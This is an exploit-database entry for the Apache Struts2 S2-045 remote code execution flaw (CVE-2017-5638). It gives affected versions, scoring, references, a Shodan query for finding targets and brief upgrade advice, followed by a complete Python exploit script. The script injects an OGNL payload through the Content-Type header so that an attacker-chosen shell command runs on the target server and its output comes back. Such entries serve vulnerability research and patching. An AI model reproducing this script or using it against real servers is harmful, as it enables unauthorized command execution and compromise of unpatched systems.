Apache Struts2 S2-045

vendor:

Struts2

by:

Anonymous

N/A

CVSS

N/A

Remote Code Execution

CWE

Product Name: Struts2

Affected Version From: Struts 2.3.5 - Struts 2.3.31

Affected Version To: Struts 2.5 - Struts 2.5.10

Patch Exists: YES

Related CWE: CVE-2017-5638

CPE: 2.3:a:apache:struts2

Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle-weblogic-cve-2017-5638/, https://www.rapid7.com/db/vulnerabilities/struts-cve-2017-5638/, https://www.rapid7.com/db/vulnerabilities/apache-struts-cve-2017-5638/

Other Scripts: N/A

Tags: cve,cve2017,apache,kev,msf,struts,rce

CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Nuclei References: https://github.com/mazen160/struts-pwn, https://isc.sans.edu/diary/22169, https://github.com/rapid7/metasploit-framework/issues/8064, https://nvd.nist.gov/vuln/detail/CVE-2017-5638, http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'html:"Apache Struts"', 'verified': True, 'vendor': 'apache', 'product': 'struts'}

Platforms Tested: Windows, Linux, Mac

2017

Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Apache Struts2. Additionally, it is recommended to apply the patch provided by the Apache Struts2 team.

Source

Exploit-DB raw data:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)